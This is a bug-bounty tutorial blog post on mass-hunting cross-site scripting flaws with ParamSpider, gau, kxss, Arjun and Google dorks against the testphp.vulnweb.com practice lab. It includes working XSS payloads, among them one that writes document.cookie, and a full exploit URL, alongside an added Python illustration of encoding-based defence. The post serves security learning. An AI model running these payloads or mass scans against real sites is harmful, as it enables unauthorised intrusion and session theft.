Hello dear friends, Assalom O Lakum, Masaud here. How are you all? Today I will show you a technique for automating cross-site scripting (XSS) hunting so that you can test for XSS across a large number of websites. In this method we will mainly use four tools. (How to Automate XSS Vulnerability Hunting – Mass XSS Hunting)
ParamSpider: With the help of ParamSpider, we can identify parameters of any website or web application and test them, including hunting for XSS on those parameters. This tool is very useful for discovering hidden or lesser-known endpoints.
Gau: Gau is an excellent tool created by Tomnomnom. With Gau, you can perform reconnaissance and information gathering. You can also use it to find URLs and subdomains, collecting information from various resources and search engines like web archives, etc.
Kxss: Kxss is a tool that helps us identify XSS candidates. It probes the discovered parameters and reports which special characters each parameter reflects unfiltered, which is the information we use to spot XSS.
Arjun: Arjun is a command-line tool that allows us to identify parameters and endpoints and find vulnerabilities in them. An important use of this tool is that we can also perform parameter brute-forcing to find hidden parameters.
Now that we have introduced the tools, let’s move on to our main topic, which is hunting XSS vulnerabilities using these tools.
Advanced Bug Bounty Automation
The use of ParamSpider
python3 paramspider.py -d vulnweb.com -o parameters.txt
When we run this command, ParamSpider extracts a number of parameters from our targeted application/website. All the parameters are saved in a file called “parameters.txt” in the output folder.
PS: Here, I am targeting a lab. I cannot test on a live target as it would be totally illegal.
The use of kxss to hunt XSS
cat parameters.txt | kxss
After that, I ran the second command, which cats the parameters.txt file into the kxss tool. The kxss tool showed me all the parameters that look vulnerable to XSS. You should only try parameters that do not filter the following characters: " ' < > $ | ( ) ` : ; { }. kxss prints these characters next to each parameter that reflects them unfiltered, and those are the parameters to test for XSS.
I have taken a simple parameter and added my payload to it.
My payload: "><img%20src=x%20onerror="alert(%27POC%20By%20Masaud%27)"
Target URL: http://testphp.vulnweb.com/hpp/index.php?pp=FUZZ
Complete URL that pops the XSS: http://testphp.vulnweb.com/hpp/index.php?pp=%22%3E%3Cimg%20src=x%20onerror=%22alert(%27POC%20By%20Masaud%27)%22
I hope you have understood it. If your payload does not work in some cases, you can intercept that request and send it to Burp Repeater and manually create a payload. You can also seek help from ChatGPT.
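As an added illustration that is not part of the original post (and not kxss's own code), the following Python reproduces the reflection check kxss performs and shows why a page that HTML-encodes the reflected parameter neutralises the payload above. The two render functions are constructed stand-ins for a page like hpp/index.php that echoes ?pp= into a link attribute.

```python
import html
from urllib.parse import unquote

# The characters kxss looks for in a reflected parameter value.
KXSS_CHARS = '"\'<>$|()`:;{}'

# The payload from the post, URL-decoded as the server would see it.
PAGE_PAYLOAD = unquote('"><img%20src=x%20onerror="alert(%27POC%20By%20Masaud%27)"')


def render_vulnerable(pp: str) -> str:
    """Constructed stand-in for a page that echoes ?pp= into an attribute unencoded."""
    return f'<a href="/hpp/index.php?pp={pp}">link</a>'


def render_hardened(pp: str) -> str:
    """Same page, but the value is HTML-attribute-encoded before it is reflected."""
    return f'<a href="/hpp/index.php?pp={html.escape(pp, quote=True)}">link</a>'


def unencoded_reflection(render) -> str:
    """Probe each kxss character and return those that come back unencoded, as kxss reports them."""
    reflected = []
    for ch in KXSS_CHARS:
        probe = f"kxss{ch}kxss"
        if probe in render(probe):
            reflected.append(ch)
    return "".join(reflected)


def breaks_out_of_attribute(render) -> bool:
    """True if the post's payload closes the href attribute and lands an <img> tag in the page."""
    return '"><img' in render(PAGE_PAYLOAD)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{name}: reflected {unencoded_reflection(render)!r}, "
              f"breaks out of attribute: {breaks_out_of_attribute(render)}")
```

Note that the hardened page still reflects `$|()`:;{}` unchanged, so kxss would still list those characters; inside a quoted attribute they are harmless, which is why a reflected character is a lead to verify, not proof of XSS on its own.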
If you come across such parameters in a bug bounty program or private pentest that pop up an XSS, explore them further. It is possible that there are other parameters that are vulnerable to XSS, but ParamSpider was unable to crawl them. In such a situation, you can always use Google dorking.
Hunting XSS using Google dorking
site:"example.com" inurl:"?goto="
In my case, the parameter was “?pp=” and the URL was testphp.vulnweb.com, so I created a Google dork for it.
site:"testphp.vulnweb.com" inurl:"?pp="
If you find extra pages on Google that contain the same parameter, there is a high chance of finding an XSS vulnerability there. After that, you can use the gau tool to find the same parameters and hunt for XSS on them.
gau example.com | grep "?goto="
gau testphp.vulnweb.com | grep "?pp="
Find more parameters using gau for mass hunting
You can see that the gau tool has given me more parameters that have a high chance of having an XSS vulnerability. You can start injecting your XSS payload here. I will try my second payload this time.
<%2FScriPt><sCripT+class%3DMasaud>document.write(document.cookie);<%2FsCriPt>
Our second payload did not work, but our original payload was successful. You can easily hunt for cross-site scripting vulnerabilities by using this method with URLs.
Use Arjun to find more parameters
arjun -u example.com/login.jsp
Using the Arjun tool, you can find more interesting parameters to try XSS attacks on. Keep trying harder and you will find more XSS vulnerabilities.
Happy hacking…! And follow me on Twitter @masaudsec.